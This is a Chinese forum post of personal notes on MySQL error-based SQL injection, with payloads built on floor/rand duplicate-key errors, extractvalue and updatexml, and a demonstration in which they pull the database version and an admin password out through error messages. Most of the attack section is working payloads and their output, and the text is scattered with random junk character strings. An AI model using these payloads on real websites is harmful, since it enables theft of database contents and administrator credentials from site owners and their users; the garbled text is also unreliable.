放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
0 R8 Z: ~2 X0 l! \! s9 o实际测试环境:
7 z7 h9 }7 X- k8 k/ w. s( s4 s0 G. f ?, a, a$ S
x. u& S; F. }! i% amysql> show tables;
" d0 U: z F, d2 g: w5 s+----------------+
) b' r% O- d/ R| Tables_in_test |
- y8 j Q9 B m, n6 C) u9 X+----------------+9 u/ K4 b+ [5 s1 `0 K* w
| admin |
& f9 T) E7 B! Q* u$ N/ W| article |
, G. L/ A b3 A' p6 m* g3 P+----------------+9 i$ m5 ^8 m6 `4 d3 X1 Q% ]5 ^
, p+ t1 t3 N1 ^
! Z$ A! l% H9 `8 u% B% q! k
9 A& W9 h/ c$ O" X7 mmysql> describe admin;
8 E) ~7 F# d w5 U6 t( }+-------+------------------+------+-----+---------+----------------+
: @. L# d; e O! h- g| Field | Type | Null | Key | Default | Extra |- f" y5 h- Z, ^+ H# ?+ a- l
+-------+------------------+------+-----+---------+----------------+
$ O( c* v. h3 Z& R: ` B| id | int(10) unsigned | NO | PRI | NULL | auto_increment |0 R4 Y @) b5 y9 d! O
| user | varchar(50) | NO | | NULL | |, H0 W; c8 t7 L0 v6 u0 ]
| pass | varchar(50) | NO | | NULL | |
3 `( U( X% y: E2 E+ R+-------+------------------+------+-----+---------+----------------+) ]- B E$ M/ }0 \5 @) [
0 a9 }8 X. I. ^% o2 C7 i
7 z9 k0 R, }* H, G; q' I
3 t% b+ [3 Z# j& s# X! f3 j
mysql> describe article;
8 b+ A5 `! Z' ~/ A3 B+---------+------------------+------+-----+---------+----------------+
( s! L. R0 E3 `5 I; A/ H4 w| Field | Type | Null | Key | Default | Extra |
! O# p& B9 \: S* K! ~/ A5 H( Y( ?+---------+------------------+------+-----+---------+----------------+
# G# |! _3 ^5 p0 k| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
' D/ T j' p8 c! Y4 h0 E4 \. R| title | varchar(50) | NO | | NULL | |
0 M! ]/ u, X9 Q| content | varchar(50) | NO | | NULL | |8 p s9 v% C5 o) n
+---------+------------------+------+-----+---------+----------------+3 Q7 ^/ e9 n7 V: h9 H1 c3 _
1、通过floor报错# a1 C x# }* @; v
可以通过如下一些利用代码7 e7 a+ W5 G7 l
$ j. u' G7 x3 x9 s* T. {; a # n) u$ @3 v' v, \. P
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
3 S% n Y' W; h: v6 F6 d% ?& z) afrom information_schema.tables group by x)a);( A; Q8 |) r; X) M: [9 R
' K0 k! T6 e# v% q" ~3 x0 A( ^" S
: [/ @7 V- k4 x" K' fand (select count(*) from (select 1 union select null union select !1)x1 H2 C7 R8 U# x! `
group by concat((select table_name from information_schema.tables limit 1),
A% g# {) Z: @0 l! e J9 c" D$ i4 `floor(rand(0)*2)));
7 H m* A7 m ~3 S举例如下:
& ]8 v% V& x& p/ g6 u2 ]4 |首先进行正常查询:' d# _3 q3 s/ l5 Y" R
( C& R$ P. T: S s( {' O
mysql> select * from article where id = 1;% a, ?, S3 l0 Q: c
+----+-------+---------+8 o- m4 S" j6 R7 R( a+ f) e9 l
| id | title | content |
X2 n. o7 }/ f+----+-------+---------+
4 P, z' K, Y( Q. s| 1 | test | do it |0 [, L# }2 ?. l$ e7 C, j
+----+-------+---------+( v. N8 E j( L
假如id输入存在注入的话,可以通过如下语句进行报错。
B) Q/ c3 J) `5 R, ]* W& K
4 v( [) Y* Y0 f0 c. B# @
- ~7 t) X# ?, P& k8 {5 Y7 q* s9 Qmysql> select * from article where id = 1 and (select 1 from! P$ C Z' ~+ X
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);$ Q, @4 v6 X- O
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key': W( S- G) X' |! G3 p ?3 b
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。+ l- l* X1 {% r
例如我们需要查询管理员用户名和密码:6 \- v$ x9 S; p8 l) w6 b
Method1:
5 `3 p- I. |; y, K& L$ h
. W7 f6 j' i$ }3 Z1 k3 d 5 {1 z7 }5 q/ N* _4 R6 A
mysql> select * from article where id = 1 and (select 1 from
0 l! |4 N6 u" S# O$ F(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
+ N& ?" ]( q9 L- W- g% Jfrom information_schema.tables group by x)a);
9 H J9 q0 @# L. mERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'1 w _2 Z, A9 k* J) D
Method2:
7 m4 l; l3 n* R q r0 `/ J
6 X6 d8 H3 o: Q) ^$ m: i# Q# ~ ! x. k ] H! u6 V% G- t- L% O+ B
mysql> select * from article where id = 1 and (select count(*)4 y% G1 e' Z# Y$ X
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
8 ^' C; [/ W3 b" o6 |floor(rand(0)*2)));
# \' [% f9 e0 c4 VERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'8 ^' `$ U; ]0 j- o
2、ExtractValue5 Y* Z. h. |8 \0 t) C
测试语句如下
3 G$ A* {% ~& C; m" i* z& o3 f
8 c8 O( D9 |) q8 A7 @* t8 Q) m! ? 8 E5 F/ P4 h/ T% P4 `+ H
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
8 [7 b* C6 q$ r& L( g$ q1 Z实际测试过程
+ Y! {7 Y2 R+ U
; I. e' T/ s- Q# ] . d' h) a: @( ^( j7 |
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,1 R4 ~* a( X1 O8 \5 w
(select pass from admin limit 1)));--
2 T0 S, `5 p+ x6 j8 z. oERROR 1105 (HY000): XPATH syntax error: '\admin888'
; L7 }+ ?. l- N2 q9 \# G# \3、UpdateXml
; u I6 x3 d$ {. Q4 R. U) _: i测试语句
9 ?4 ]2 i" C$ z: F
) d4 o. e1 c7 C2 A2 a9 D 1 ]# L0 I) m K' D" ~3 r" A
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
/ e! V, R& t1 H9 ~实际测试过程
( t1 l% [6 @; ~' p; k
$ v! L( e: h: D% D+ H ! p' u2 A& q4 R+ J: F
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
. t2 X1 g h+ F) o(select pass from admin limit 1),0x5e24),1));- @. ~# l& V! F2 s. N
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
8 m' c8 J5 ?( e( s- eAll, thanks foreign guys.
* T# I- J+ ]! B. w/ l% O7 D/ V7 v: J
) U$ p$ v5 j; p
: ^% \7 y% [+ u8 C' I |
发表于 2012-12-10 10:28:51
收藏
支持
反对